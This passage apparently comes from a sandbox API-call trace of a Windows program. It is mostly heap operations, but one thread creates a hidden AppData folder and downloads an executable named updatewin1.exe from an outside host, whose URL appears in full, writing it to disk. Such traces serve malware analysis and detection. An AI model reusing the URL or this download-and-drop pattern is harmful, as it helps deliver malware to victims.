hHeap=0x730000, dwFlags=0x0, lpMem=0x9bc9e48 | out: hHeap=0x730000) returned 1 [0117.811] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bb88e0 | out: hHeap=0x730000) returned 1 [0117.811] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bb9168 | out: hHeap=0x730000) returned 1 [0117.811] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bb99f0 | out: hHeap=0x730000) returned 1 [0117.811] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bc8960 | out: hHeap=0x730000) returned 1 [0117.811] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bba278 | out: hHeap=0x730000) returned 1 [0117.811] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bbab00 | out: hHeap=0x730000) returned 1 [0117.811] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bbb388 | out: hHeap=0x730000) returned 1 [0117.811] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bb6f48 | out: hHeap=0x730000) returned 1 [0117.811] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bbc498 | out: hHeap=0x730000) returned 1 [0117.811] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bc7848 | out: hHeap=0x730000) returned 1 [0117.811] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33a3e60 | out: hHeap=0x730000) returned 1 [0117.811] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x333f0d8 | out: hHeap=0x730000) returned 1 [0117.812] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33a4b00 | out: hHeap=0x730000) returned 1 [0117.812] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33a2e20 | out: hHeap=0x730000) returned 1 [0117.812] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3339cb8 | out: hHeap=0x730000) returned 1 [0117.812] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33393c0 | out: hHeap=0x730000) returned 1 [0117.812] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33788e0 | out: hHeap=0x730000) returned 1 [0117.812] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bf3888 | out: hHeap=0x730000) returned 1 [0117.812] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bf4110 | out: hHeap=0x730000) returned 1 [0117.812] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bf4998 | out: hHeap=0x730000) returned 1 [0117.812] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bf5220 | out: hHeap=0x730000) returned 1 [0117.812] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x333f550 | out: hHeap=0x730000) returned 1 [0117.812] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bec2a8 | out: hHeap=0x730000) returned 1 [0117.812] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bf1fb8 | out: hHeap=0x730000) returned 1 [0117.812] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bf27d0 | out: hHeap=0x730000) returned 1 [0117.812] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9becb30 | out: hHeap=0x730000) returned 1 [0117.812] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bed3b8 | out: hHeap=0x730000) returned 1 [0117.812] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bedc40 | out: hHeap=0x730000) returned 1 [0117.812] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bee4c8 | out: hHeap=0x730000) returned 1 [0117.812] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bf3000 | out: hHeap=0x730000) returned 1 [0117.812] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3335c20 | out: hHeap=0x730000) returned 1 [0117.812] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bcaae0 | out: hHeap=0x730000) returned 1 [0117.812] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bcb368 | out: hHeap=0x730000) returned 1 [0117.812] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bcbbf0 | out: hHeap=0x730000) returned 1 [0117.812] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bcc478 | out: hHeap=0x730000) returned 1 [0117.812] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bccd00 | out: hHeap=0x730000) returned 1 [0117.812] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33bb2d8 | out: hHeap=0x730000) returned 1 [0117.812] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bcd588 | out: hHeap=0x730000) returned 1 [0117.812] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bcde10 | out: hHeap=0x730000) returned 1 [0117.812] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bdaac8 | out: hHeap=0x730000) returned 1 [0117.812] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bdb310 | out: hHeap=0x730000) returned 1 [0117.812] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bdbb78 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bce698 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bcef20 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bdc3e0 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bdcc28 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bcf7a8 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bd0030 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bd08b8 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bd1140 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bd19c8 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bd2250 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bd2ad8 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bd3360 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bd3be8 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bd4470 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bdd470 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bddcd8 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bd4cf8 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bd5580 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bd5e08 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bde540 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bded88 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bd6690 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bd6f18 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bd77a0 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bd8028 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bd88b0 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bd9138 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bd99c0 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bdf5e8 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bdfe70 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bef5d0 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9befe38 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9be06f8 | out: hHeap=0x730000) returned 1 [0117.813] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9be0f80 | out: hHeap=0x730000) returned 1 [0117.814] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9be1808 | out: hHeap=0x730000) returned 1 [0117.814] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bf06a0 | out: hHeap=0x730000) returned 1 [0117.814] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9be2090 | out: hHeap=0x730000) returned 1 [0117.814] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9be2918 | out: hHeap=0x730000) returned 1 [0117.814] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9be31a0 | out: hHeap=0x730000) returned 1 [0117.814] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9be3a28 | out: hHeap=0x730000) returned 1 [0117.814] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9be42b0 | out: hHeap=0x730000) returned 1 [0117.814] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9be4b38 | out: hHeap=0x730000) returned 1 [0117.814] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9be53c0 | out: hHeap=0x730000) returned 1 [0117.814] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9be5c48 | out: hHeap=0x730000) returned 1 [0117.814] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9be64d0 | out: hHeap=0x730000) returned 1 [0117.814] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9be6d58 | out: hHeap=0x730000) returned 1 [0117.814] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bf0ee8 | out: hHeap=0x730000) returned 1 [0117.814] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bf1750 | out: hHeap=0x730000) returned 1 [0117.814] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9be75e0 | out: hHeap=0x730000) returned 1 [0117.814] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9be7e68 | out: hHeap=0x730000) returned 1 [0117.814] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9be86f0 | out: hHeap=0x730000) returned 1 [0117.814] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9be8f78 | out: hHeap=0x730000) returned 1 [0117.814] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9be9800 | out: hHeap=0x730000) returned 1 [0117.814] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bea088 | out: hHeap=0x730000) returned 1 [0117.814] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bea910 | out: hHeap=0x730000) returned 1 [0117.814] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9beb198 | out: hHeap=0x730000) returned 1 [0117.814] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9beba20 | out: hHeap=0x730000) returned 1 [0117.814] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33bf470 | out: hHeap=0x730000) returned 1 [0117.814] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33baac0 | out: hHeap=0x730000) returned 1 [0117.814] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x333f4e8 | out: hHeap=0x730000) returned 1 [0117.814] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33b9a48 | out: hHeap=0x730000) returned 1 [0117.814] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bbef40 | out: hHeap=0x730000) returned 1 [0117.814] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33bec58 | out: hHeap=0x730000) returned 1 [0117.814] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33be360 | out: hHeap=0x730000) returned 1 [0117.815] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x7515c8 | out: hHeap=0x730000) returned 1 [0117.816] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x7506e0 | out: hHeap=0x730000) returned 1 [0117.817] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18e730 | out: phModule=0x18e730) returned 0 [0117.817] ExitProcess (uExitCode=0x0) [0117.817] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33649a0 | out: hHeap=0x730000) returned 1 [0117.818] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x74f2b8 | out: hHeap=0x730000) returned 1 [0117.822] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Thread: id = 78 os_tid = 0x48c Thread: id = 79 os_tid = 0x248 Thread: id = 80 os_tid = 0x6dc Thread: id = 81 os_tid = 0x734 Thread: id = 82 os_tid = 0x688 Thread: id = 83 os_tid = 0x4fc Thread: id = 84 os_tid = 0x57c Thread: id = 85 os_tid = 0x1c0 Thread: id = 86 os_tid = 0x864 [0105.042] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x110) returned 0x3331f00 [0105.043] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x110) returned 0x330e1b0 [0105.043] GetLastError () returned 0x54f [0105.043] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x3bc) returned 0x3333408 [0105.043] GetCurrentThreadId () returned 0x864 [0105.043] SetLastError (dwErrCode=0x54f) [0105.043] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x40) returned 0x3324178 [0105.043] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x18) returned 0x3313f58 [0105.043] GetLastError () returned 0x54f [0105.043] SetLastError (dwErrCode=0x54f) [0105.043] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x40) returned 0x33241c0 [0105.043] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x33127b0 [0105.043] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3313f58 | out: hHeap=0x730000) returned 1 [0105.043] GetLastError () returned 0x54f [0105.043] SetLastError (dwErrCode=0x54f) [0105.043] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x33125b8 [0105.043] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x48) returned 0x334dce0 [0105.043] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33127b0 | out: hHeap=0x730000) returned 1 [0105.043] GetLastError () returned 0x54f [0105.043] SetLastError (dwErrCode=0x54f) [0105.043] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x33127b0 [0105.044] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x60) returned 0x820e90 [0105.044] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x334dce0 | out: hHeap=0x730000) returned 1 [0105.044] GetLastError () returned 0x54f [0105.044] SetLastError (dwErrCode=0x54f) [0105.044] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3312548 [0105.044] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x90) returned 0x7829c8 [0105.044] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x820e90 | out: hHeap=0x730000) returned 1 [0105.044] GetLastError () returned 0x54f [0105.044] SetLastError (dwErrCode=0x54f) [0105.044] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x33123f8 [0105.044] GetLastError () returned 0x54f [0105.044] SetLastError (dwErrCode=0x54f) [0105.044] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x330e1b0 | out: hHeap=0x730000) returned 1 [0105.044] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0105.045] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathA") returned 0x75ae7804 [0105.045] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x400) returned 0x33337d0 [0105.045] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x33337d0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0105.045] UuidCreate (in: Uuid=0x9bad768 | out: Uuid=0x9bad768) returned 0x0 [0105.046] UuidToStringA (in: Uuid=0x9bad768, StringUuid=0x9bad6c0 | out: StringUuid=0x9bad6c0) returned 0x0 [0105.047] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x33124d8 [0105.047] RpcStringFreeA (in: String=0x9bad6c0 | out: String=0x9bad6c0) returned 0x0 [0105.047] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5") returned 1 [0105.047] CreateDirectoryA (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5"), lpSecurityAttributes=0x0) returned 1 [0105.048] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x410) returned 0x3333bd8 [0105.048] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x410) returned 0x3340ef0 [0105.048] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x1000) returned 0x3377fe8 [0105.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3340ef0, cbMultiByte=-1, lpWideCharStr=0x3377fe8, cchWideChar=2048 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5") returned 81 [0105.048] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x1010) returned 0x3378ff0 [0105.048] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3377fe8 | out: hHeap=0x730000) returned 1 [0105.048] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3340ef0 | out: hHeap=0x730000) returned 1 [0105.048] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x18) returned 0x3313f58 [0105.048] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0105.048] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x40) returned 0x3324208 [0105.048] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x860) returned 0x3377fe8 [0105.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3324208, cbMultiByte=-1, lpWideCharStr=0x3377fe8, cchWideChar=1072 | out: lpWideCharStr="http://nokd.top/files/penelop/updatewin1.exe") returned 45 [0105.048] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x870) returned 0x3340ef0 [0105.048] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3377fe8 | out: hHeap=0x730000) returned 1 [0105.048] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3324208 | out: hHeap=0x730000) returned 1 [0105.058] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x870) returned 0x3341768 [0105.058] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x3377fe8 [0105.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://nokd.top/files/penelop/updatewin1.exe", cchWideChar=-1, lpMultiByteStr=0x3377fe8, cbMultiByte=2096, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://nokd.top/files/penelop/updatewin1.exe", lpUsedDefaultChar=0x0) returned 45 [0105.058] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x840) returned 0x337a008 [0105.058] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3377fe8 | out: hHeap=0x730000) returned 1 [0105.058] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3341768 | out: hHeap=0x730000) returned 1 [0105.058] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://nokd.top/files/penelop/updatewin1.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0106.272] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x337a008 | out: hHeap=0x730000) returned 1 [0106.272] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x9bad6d0, lpdwBufferLength=0x9bad710, lpdwIndex=0x0 | out: lpBuffer=0x9bad6d0*, lpdwBufferLength=0x9bad710*=0x4, lpdwIndex=0x0) returned 1 [0106.273] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x40) returned 0x33243b8 [0106.273] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x336aeb0 [0106.273] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33243b8 | out: hHeap=0x730000) returned 1 [0106.273] lstrcpyA (in: lpString1=0x33337d0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5" [0106.273] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5", pMore="updatewin1.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe") returned 1 [0106.273] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x60) returned 0x333f070 [0106.273] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5f0 [0106.274] SetFilePointer (in: hFile=0x5f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.274] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0106.309] WriteFile (in: hFile=0x5f0, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.310] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0106.340] WriteFile (in: hFile=0x5f0, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.340] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0106.350] WriteFile (in: hFile=0x5f0, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.351] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0106.380] WriteFile (in: hFile=0x5f0, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.381] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0106.384] WriteFile (in: hFile=0x5f0, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.385] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0106.394] WriteFile (in: hFile=0x5f0, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.394] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0106.397] WriteFile (in: hFile=0x5f0, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.397] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0106.415] WriteFile (in: hFile=0x5f0, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: 